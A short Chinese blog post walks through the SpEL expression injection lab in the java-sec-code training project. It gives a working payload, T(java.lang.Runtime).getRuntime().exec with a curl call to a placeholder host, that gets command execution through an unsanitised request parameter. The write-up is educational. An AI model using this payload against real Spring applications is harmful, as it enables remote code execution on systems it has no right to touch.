[Java-sec-code]SpEL表达式注入

凉夜lrs

 关注

阅读 121

2022-10-27


文章目录

  • ​​SpEL​​
  • ​​SpEL表达式注入​​

SpEL

我们学安全主要了解那些对我们有用的东西,在这里有一篇链接方便大家进行了解https://www.jianshu.com/p/e0b50053b5d3
此外,我觉得其中最重要的是​​​通过 T() 调用一个类的静态方法,它将返回一个 Class Object,然后再调用相应的方法或属性:​​​,并且如果包在​​java.lang​​下面可以省略这一部分,因此我们便可以利用此方法调用Runtime执行命令

SpEL表达式注入

在​​org/joychou/controller/SpEL.java​​下面,在这里获取get传入的expression参数,并对其进行解析

[Java-sec-code]SpEL表达式注入_el表达式

因此我们只需要构造

T(java.lang.Runtime).getRuntime().exec("curl http://xxx.xx.xx?a=Y4tacker")

简化一下就是

T(Runtime).getRuntime().exec("curl http://xxx.xx.xx?a=Y4tacker")

成功执行

[Java-sec-code]SpEL表达式注入_d3_02


相关推荐

Java-sec-code SpEL 代码审计

曾宝月 79 0 0

spel 表达式语言 注入

夏侯居坤叶叔尘 210 0 0

[Java-sec-code]Java velocity SSTI

看山远兮 205 0 0

Spring Cloud Function Spel表达式注入

田妞的读书笔记 69 0 0

SpEL表达式注入漏洞分析、检查与防御

吃面多放酱 82 0 0

Spring Cloud Function SpEL表达式注入漏洞分析

沐之轻语 87 0 0

一文详解SpEL表达式注入漏洞

phpworkerman 206 0 0

Spring SpEL 表达式语言

慕犹清 26 0 0

Spring Cloud Function SpEL表达式注入漏洞poc验证

彪悍的鼹鼠 127 0 0

【漏洞复现】Spring Cloud Function SPEL表达式注入漏洞

whiteMu 170 0 0

精彩评论(0)

0 0 举报